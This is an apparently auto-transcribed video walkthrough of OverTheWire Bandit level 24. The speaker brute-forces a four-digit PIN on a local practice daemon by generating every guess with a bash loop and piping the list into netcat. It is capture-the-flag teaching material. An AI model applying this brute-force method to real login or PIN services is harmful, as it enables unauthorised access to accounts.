 What's going on guys? Welcome back to the YouTube video. My name is John Hammond and we are still in Bandit over the Y War game Let's jump back in. We just finished up with level 23 now. We're jumping into level 24 I've got that file saved so we can use our SSH pass real easy and just make the connection that we need cool What is the prompt here? It says a daemon is listening on port 3,000 or 30,002 and will give the password for Bandit 25 if the given password for Bandit 24 and a secret numeric four-digit PEN code There's no way to retrieve the PEN code except by going through all of the 10,000 combinations called brute forcing Hmm. Okay. Well If it's just a number That we don't know we can probably loop through numbers and guess right and we have the password for Bandit 24 We can just check that and it's at the bandit pass Bandit 24 right there it is So let's try and connect to this daemon listening on port 30,002 We can do that with netcat, right? We know we can create a socket and a connection to 30,002 I'm the pin code checker for user 25 Please enter the password for the user Bandit 24 and the secret PEN code on a single line separated by a space hmm so random guess three eight two six and oh I'm sorry. It's probably gonna be the other way around the password first and then three eight two six random guess wrong Please enter the correct PEN code and try again Okay, hmm Well Okay, let's break out of that. I use control C to break out and let's think about how we can do this we had seen previously in Cron D Cron job it was like Bandit 24, right? this guy has this script that we had seen before had been using a for loop in a shell script and We might be able to use a for loop to just iterate through those numbers Let's keep the password in our in our clipboard and let's check out on Google How to do a bash for loop numbers totally just Taking the first Google result And I know the syntax here, but I want to do this so you know, okay Just Google the things that you need to know So this is the syntax another for with the do and done and then doing what you're trying to do in that code block Put together with doing done, but to loop through numbers. You can use these curly braces here And then at the range that you want with a single period in another period. So step just like that. Let's Create a script. Can we get to let's make it home for ourselves John temp for Time for whatever Let's get there and let's create a new script Let's call this like hammer.sh Can't create a save directory. That's okay. We know we're using a bash script So let's bin bash the shebang line that we've got and that's just necessary for the System to know what kind of program we are using What kind of shell or scripting language that we want to use so we're going from one To ten thousand so let's do done and let's just check out what that variable is right now echo I'm gonna save this mark the script executable ch mod plus X and now we can run hammer.sh when I hit enter here, you see it is zoom in through all of these and If we just pipe this into head so we get the first couple lines We're only getting one two three four five six seven eight nine ten But that's not a four-digit pin code right now That's just a number of digits of the number that we're on but we want the four digits. So What do we do? No additional input on this website, whatever I'm gonna let you in a little secret. I can just go ahead and tell you is That if you put the prefix zeros or the zeros right in the front before you're trying to do what you're trying to do Like if you're before your number that you're working with I guess we can really start from zero in case 0000 just happens to be the pin code It will keep all of those preceding zeros or it'll keep that That digits that the four digits that you were working with to begin with so now we'll go from 0000 to 9999 and it'll keep that four-digit pin code so Let's try this now if I bring this to head you can see it kept all those zeros right at the start and Let's actually use three since it looks like it is filling out and keeping that for there Let's keep the zero zero zero By only using three so that way we get a four-digit pin code and not a five-digit pin code that looked like it was giving us Let's try this out dot sh Great Did I save it did that work? I did Are we going too high? Did I have too many zeros on there? No, because that makes no sense. Okay, maybe we can it's probably keeping that last digit because we're getting all the way to 10,000 if we kept this to 9999 See, how does that look? Did it keep The three. Yeah, okay. Good. So now it goes to the four and let's check out the first hundred good Okay, so now it's keeping the four digits that we want here. So while that is being echoed out We also want to have our Bandit 24 password in there, right? I'm gonna put this in quotes just so it looks like all one string argument for the echo command So now Every iteration it'll print out the number keeping the four digits for the pin code and with the with the password included so If we run this script our loop works just fine Now let's pipe that into the net cat connection. We will net cat localhost 30,000 and to Run this script It does this over and over and over again. This is going to be a little slow and Not very convenient for us. So Let's print out what we are what what number iteration we're on what our value of I is on another line and Let's grep tech V for not wrong and This will take a while at this point you are running the exploit or you're running the attack Or you're doing what you need to do to actually successfully Get the password here. I will let this run and Eventually it'll get the password for us and Then hopefully I can show that in the video so you can see it and we'll move on But definitely just let this run trust the time if you want to do something a little bit more special You might be able to try counting down because it's probably not going to be a Four-digit pin code with the first two or three digits being a zero you can go from 9999 and down and to 0 0 0 0 so you might get you might hit the key a little bit faster In fact, I'll do that and then I'll pause the video So until it happens. I totally like lost my train of thought for a second. We're just switching the numbers So now we're working down and I guess we can I can grep for like correct or something and Hopefully that will work Okay All around the script and let you know once it gets an answer Okay, it caught it and I broke out so Looks like the pin was five forty five thousand four hundred and forty five four four zero. I got correct so it didn't tell us the password and That's my fault because I had grept I had grept for correct and that did not help us whatsoever Because we didn't get to see the line that actually had the password so I Guess we can look for bandit 25, but now that we know what number it is. We can just run that single command Let's break out of the script and paste that in here Let's run it at five four four zero The pin code and correct, okay The username is bandit 25 and the password is this guy right here sweet. Let's save the string But that was awful, right? I Gotta say that took a long long time So and even then I ruined it because I grep for correct. So it was totally wrong I really hope you didn't end up wasting your time like I did so Let's try and make this better. Let's see what we can do if I check out that hammer script Since the the service or what we're connecting to actually just displays and exits After it after it sees the the correct key. Can we just echo all of these? Out to begin with can I just run hammer? Oh No Hammer.sh I Don't want I don't actually want to send it to the service. I want to actually just prepare all of this input Like so we loop through everything and it's all a line It's all multiple lines of everything that we want and if I redirect this to like brute force Totally spell brute force, right? brute force dot text if we catted brute force dot text now We have all that output on centered input or on on our screen on centered output on that stream Can we just pipe that into neck at local host and will it read it all properly? That I don't know so let's find out Try this it pins go through all of it and it does okay dang sweet That kept all of our input on the same screen and it just happened like almost instantly we didn't have to wait for anything so that's a better solution and Man, I wish I had given you that first, but hey sometimes we don't know sometimes we've got to try and Even like how I'd rep for correct That was a stupid move because we never know and I hope this is like a learning point for you Is it we never know what that service is going to do or how it's going to behave? Especially when we and what it does what we want it to do We could have assumed it would just give us something like password But we never know if it would just spit out the password itself. Maybe it wouldn't give us the word So having this input all prepared just all those lines and then spitting that and keeping it in that buffer or that stream Maybe piped in it was a good move. Okay. Cool. Thank you guys for watching. Hope you enjoyed this Let's save this password as bandit 25 and Let's keep moving on. I'll see you in the next video